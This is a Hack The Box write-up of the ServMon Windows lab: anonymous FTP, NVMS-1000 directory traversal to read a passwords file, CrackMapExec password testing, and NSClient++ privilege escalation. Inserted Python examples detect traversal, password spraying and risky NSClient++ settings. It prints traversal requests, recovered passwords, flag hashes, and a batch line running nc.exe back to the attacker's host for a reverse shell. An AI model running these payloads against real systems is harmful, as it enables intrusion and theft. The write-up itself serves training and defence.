Hack-The-Box-walkthrough[ServMon]

Introduction

Operating system: Windows
Difficulty: Easy
Points: 20
Released: 11 April 2020
IP: 10.10.10.184

User first blood: 3 hours 08 minutes 06 seconds.
Root first blood: 3 hours 34 minutes 10 seconds.

  • my htb rank

Information gathering

Start with nmap:

C:\Users\HASEE>nmap -sC -sV -v -p- 10.10.10.184 --min-rate=10000
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| refo
|_ 2-contai
| http-methods:
|_ Supported Methods: GET
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

Port 21 allows anonymous FTP login without a password.

Inside there are two user folders.

Nadine

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Nathan

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Port 80 hosts the web application NVMS-1000, which has a directory traversal vulnerability; an exploit for it can be found online.

  • NVMS-1000-Directory-Traversal

Looking at the exploit:

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Using this vulnerability together with the information from the text files collected earlier, the following passwords can be read out:

POST /../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
If-Modified-Since: 0
Authorization: Basic Y3F3Yzpxd2M=
Content-Type: text/plain;charset=UTF-8
Content-Length: 103
Origin: http://10.10.10.184
Connection: close
Referer: http://10.10.10.184/Pages/login.htm
Cookie: dataPort=6063
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
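As an added defensive example (not part of this walkthrough and not NVMS-1000's own code), the vulnerable path-join pattern behind the traversal above sits beside a hardened resolver, and a small check flags traversal-looking requests in constructed access-log lines. The web root /srv/nvms/www, the log lines and all function names are assumptions made for the illustration.

```python
# Added example: vulnerable path join vs. hardened resolver, plus a log check.
# WEB_ROOT, SAMPLE_LOG and the function names are assumptions for this example.
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/srv/nvms/www"   # assumed web root


def resolve_naively(root: str, request_path: str) -> str:
    """The vulnerable pattern: glue the request path onto the web root and hand
    it to the filesystem. '..' segments survive and walk out of the root."""
    return root + request_path


def where_naive_lands(root: str, request_path: str) -> str:
    """Where the OS actually opens the naively joined path once '..' is applied."""
    return posixpath.normpath(resolve_naively(root, request_path))


def resolve_safely(root: str, request_path: str):
    """Hardened resolution: decode, unify separators, collapse '.'/'..', then
    refuse anything that does not stay inside the web root (returns None)."""
    decoded = request_path
    for _ in range(3):                      # undo double/triple percent-encoding
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:                   # NUL would truncate the path in native code
        return None
    decoded = decoded.replace("\\", "/")    # Windows servers accept '\' as a separator
    root = root.rstrip("/")
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None                         # resolved outside the web root
    return full


# Raw, encoded and double-encoded '..' followed by either separator.
TRAVERSAL_RE = re.compile(r"(\.\.|%2e%2e|%252e%252e)(/|\\|%2f|%5c)", re.IGNORECASE)


def flag_traversal_requests(log_lines):
    """Return the log lines whose request line looks like a traversal attempt."""
    return [line for line in log_lines if TRAVERSAL_RE.search(line)]


# Constructed sample log lines (not real traffic): the first mirrors the PoC
# request, the second is the same idea percent-encoded, the third is benign.
SAMPLE_LOG = [
    '10.10.14.4 - - "GET /../../../../../../windows/win.ini HTTP/1.1" 200 156',
    '10.10.14.4 - - "GET /%2e%2e/%2e%2e/users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156',
    '10.10.14.4 - - "GET /Pages/login.htm HTTP/1.1" 200 340',
]

if __name__ == "__main__":
    poc = "/../../../../../../../../../../../../windows/win.ini"
    print("naive :", where_naive_lands(WEB_ROOT, poc))    # /windows/win.ini
    print("safe  :", resolve_safely(WEB_ROOT, poc))       # None
    print("normal:", resolve_safely(WEB_ROOT, "/Pages/login.htm"))
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("ALERT :", hit)
```

The resolver joins first and normalises afterwards on purpose: normalising the request path on its own would silently clamp "/../../windows/win.ini" to "/windows/win.ini" and lose the evidence that a traversal was attempted, whereas the joined form ends up outside the root and can be rejected and logged.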

Port 8443 serves HTTPS and is running NSClient++; see the URL below.

  • About-NSClient++

With the passwords in hand, test them with CrackMapExec (by Marcello) to work out which account (Nadine or Nathan) goes with which password.

  • CrackMapExec

root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nadine -p pass.txt 
CME 10.10.10.184:445 SERVMON [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [+] SERVMON\Nadine:L1k3B1gBut7s@W0rk
[*] KTHXBYE!
root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nathan -p pass.txt
CME 10.10.10.184:445 SERVMON [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
CME 10.10.10.184:445 SERVMON [-] SERVMON\Nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
[*] KTHXBYE!
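As an added example (not from the walkthrough), here is the detection side of the CrackMapExec runs above: the same sequence of failures and one success, replayed as constructed Windows logon events (4625 = failed logon, 4624 = successful logon), is fed to a small password-spraying detector. The event fields, the 10.10.14.4 source address and the thresholds are assumptions.

```python
# Added example: spray/guessing detector over constructed logon events.
# Event layout, addresses and thresholds are assumptions for this example.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class LogonEvent:
    when: datetime
    event_id: int        # 4624 = successful logon, 4625 = failed logon
    account: str
    source_ip: str


def detect_spray(events, min_failures=5, window=timedelta(minutes=10)):
    """Group logon events by source IP and report sources that produced at least
    min_failures failed logons inside `window`. For each flagged source also list
    accounts that logged on successfully after failing from that source, which is
    the signature of a guessed or sprayed password that worked."""
    by_source = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.when):
        by_source[ev.source_ip].append(ev)

    findings = {}
    for src, evs in by_source.items():
        failures = [e for e in evs if e.event_id == 4625]
        peak, start = 0, 0                   # sliding window over sorted failures
        for end in range(len(failures)):
            while failures[end].when - failures[start].when > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < min_failures:
            continue
        failed_accounts = {e.account for e in failures}
        compromised = sorted({
            e.account for e in evs
            if e.event_id == 4624 and e.account in failed_accounts
            and any(f.account == e.account and f.when < e.when for f in failures)
        })
        findings[src] = {
            "failures_in_window": peak,
            "accounts_tried": sorted(failed_accounts),
            "success_after_failures": compromised,
        }
    return findings


def build_sample_events():
    """Constructed events mirroring the CrackMapExec output above: Nadine fails
    three times then succeeds, Nathan fails seven times, all from one source.
    A second source shows a single benign typo followed by a successful logon."""
    t0 = datetime(2020, 4, 23, 7, 20, 0)
    events = []
    tick = 0
    for _ in range(3):
        events.append(LogonEvent(t0 + timedelta(seconds=tick), 4625, "Nadine", "10.10.14.4"))
        tick += 1
    events.append(LogonEvent(t0 + timedelta(seconds=tick), 4624, "Nadine", "10.10.14.4"))
    tick += 1
    for _ in range(7):
        events.append(LogonEvent(t0 + timedelta(seconds=tick), 4625, "Nathan", "10.10.14.4"))
        tick += 1
    events.append(LogonEvent(t0 + timedelta(minutes=2), 4625, "Nathan", "10.10.14.9"))
    events.append(LogonEvent(t0 + timedelta(minutes=2, seconds=5), 4624, "Nathan", "10.10.14.9"))
    return events


if __name__ == "__main__":
    for src, info in detect_spray(build_sample_events()).items():
        print(src, info)
```

On a real host the events would come from the Security log (for example via Get-WinEvent filtered on IDs 4624 and 4625, with the source address taken from the IpAddress field); the threshold of five failures in ten minutes is deliberately low because a single workstation rarely fails that often against several accounts.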

Now we have a valid account and password:

Nadine/L1k3B1gBut7s@W0rk

Using the password to access the SMB shares shows no useful permissions:

root@kali:~/vulnhub/ServMon# crackmapexec smb 10.10.10.184 -u Nadine -p L1k3B1gBut7s@W0rk --shares
CME 10.10.10.184:445 SERVMON [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:SERVMON)
CME 10.10.10.184:445 SERVMON [+] SERVMON\Nadine:L1k3B1gBut7s@W0rk
CME 10.10.10.184:445 SERVMON [+] Enumerating shares
CME 10.10.10.184:445 SERVMON SHARE Permissions
CME 10.10.10.184:445 SERVMON ----- -----------
CME 10.10.10.184:445 SERVMON ADMIN$ NO ACCESS
CME 10.10.10.184:445 SERVMON IPC$ READ
CME 10.10.10.184:445 SERVMON C$ NO ACCESS
[*] KTHXBYE!

Then connect via SSH, change to the desktop directory and read user.txt:

nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of C:\Users\Nadine\Desktop

08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
23/04/2020 07:25 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,427,053,568 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
daf5f2dab64783e2c42e4249e9821ab7

Privilege escalation

Access the NSClient++ web interface.

Run the following command to display the password:

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

Logging in fails, however. Investigation shows that nsclient.ini restricts which hosts may reach the web interface: only the local loopback interface (127.0.0.1) is allowed:

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
...

Now use SSH to forward TCP port 8443 to 127.0.0.1 on the local machine:

  • SSH-Port-Forwarding-Example

ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184

After running the command above, the web interface can be reached successfully.

Use the NSClient++ 0.5.2.35 privilege escalation vulnerability to escalate privileges.

Reference exploit:

  • NSClient++0.5.2.35-Privilege-Escalation

Looking at the exploit:

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System
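As an added example (not from the walkthrough and not NSClient++'s own code), a small audit of an nsclient.ini that reports the three conditions this escalation depends on: a cleartext web password readable by local users, an allowed hosts setting that is either wider than loopback or loopback-only but still reachable through an SSH port forward, and CheckExternalScripts plus Scheduler both enabled. The INI text is constructed; the [/settings/default] keys follow the fragment shown earlier and [/modules] is NSClient++'s module section, but treat the exact names and the placeholder password as assumptions.

```python
# Added example: audit an nsclient.ini for the settings the escalation relies on.
# SAMPLE_INI is constructed; section/key names are assumptions based on the
# fragment shown in the walkthrough.
import configparser
import ipaddress

SAMPLE_INI = """\
# constructed sample, modelled on the fragment shown in the walkthrough
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/default]
; Undocumented key
password = EXAMPLE-PASSWORD-PLACEHOLDER

; Undocumented key
allowed hosts = 127.0.0.1
"""

RISKY_MODULES = ("CheckExternalScripts", "Scheduler")


def parse_nsclient_ini(text: str) -> configparser.ConfigParser:
    """NSClient++ uses '/path/like' section names and keys containing spaces;
    configparser copes with both once interpolation is off and case is kept."""
    cfg = configparser.ConfigParser(allow_no_value=True, interpolation=None,
                                    delimiters=("=",), comment_prefixes=("#", ";"),
                                    strict=False)
    cfg.optionxform = str          # keep module names case-sensitive
    cfg.read_string(text)
    return cfg


def audit_nsclient_ini(text: str):
    """Return a list of human-readable findings for the settings that matter here."""
    cfg = parse_nsclient_ini(text)
    findings = []
    default = cfg["/settings/default"] if cfg.has_section("/settings/default") else {}

    # 1. cleartext web password (the walkthrough reads it with 'nscp web -- password --display')
    if default.get("password"):
        findings.append("web password is stored in cleartext in nsclient.ini; any local user "
                        "who can read the file or run 'nscp web -- password --display' can log in")

    # 2. which sources may reach the web UI
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    non_loopback = []
    for host in hosts:
        try:
            if not ipaddress.ip_network(host, strict=False).is_loopback:
                non_loopback.append(host)
        except ValueError:            # hostnames or wildcards: treat as not loopback
            non_loopback.append(host)
    if non_loopback:
        findings.append("allowed hosts permits non-loopback sources: " + ", ".join(non_loopback))
    elif hosts:
        findings.append("allowed hosts is loopback-only, which still lets any user with an SSH "
                        "login reach the web UI through a local port forward (ssh -L)")

    # 3. the module pair that turns a web-UI login into code running as the service account
    modules = cfg["/modules"] if cfg.has_section("/modules") else {}
    enabled = [m for m in RISKY_MODULES
               if str(modules.get(m, "")).lower() in ("1", "enabled", "true")]
    if len(enabled) == len(RISKY_MODULES):
        findings.append("CheckExternalScripts and Scheduler are both enabled: a web-UI login can "
                        "schedule an arbitrary script that runs as the service account (Local System)")
    return findings


if __name__ == "__main__":
    for finding in audit_nsclient_ini(SAMPLE_INI):
        print("-", finding)
```

The loopback-only case is reported deliberately: as the walkthrough shows, allowed hosts = 127.0.0.1 only keeps remote browsers out, and any account with an SSH login (here Nadine) can still reach the interface over a local forward, so the file ACL on nsclient.ini and the module set are the controls that actually matter.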

First check the installed version to see whether it is affected:

nadine@SERVMON C:\Program Files\NSClient++>nscp test
D core NSClient++ 0.5.2.35 2018-01-28 x64 Loading settings and logger...
C:\Program Files\NSClient++\nsclient.log could not be opened, Discarding: debug: NSClient++ 0.5.2.35 2018-01-28 x64 Loading settings and logger...

It is indeed affected by this vulnerability. Next, create a batch script and place it in the c:\Temp\ directory:

evil.bat

@echo off
c:\temp\nc.exe 10.10.14.4 443 -e cmd.exe

Then put nc.exe into the c:\temp\ directory.

Configure a script as shown in the screenshot below, so that running it later executes the batch file and returns a shell.

Restart the NSClient service using the "control" button in the interface;

Run the script just created from the "queries" tab of the web interface…

A shell comes back successfully:

C:\Users\HASEE\Desktop\hack the box靶机渗透\ServMon>nc.exe -lvp 443
listening on [any] 443 ...
10.10.10.184: inverse host lookup failed: h_errno 11004: NO_DATA (11004:11004)
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.184] 50272: NO_DATA (11004:11004)
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

And finally root.txt:

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of C:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
23/04/2020 08:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,433,795,584 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
887fe3797897795b474ceba6a399f7bd

Summary of key points:

  • Anonymous FTP login on port 21 without a password
  • NVMS-1000 directory traversal vulnerability
  • Testing accounts and passwords against SMB with CrackMapExec
  • SSH local port forwarding
  • NSClient++ 0.5.2.35 privilege escalation vulnerability
  • Using nc.exe 10.10.14.4 443 -e cmd.exe to get a reverse Windows cmd shell

Game over

The end, to be continued…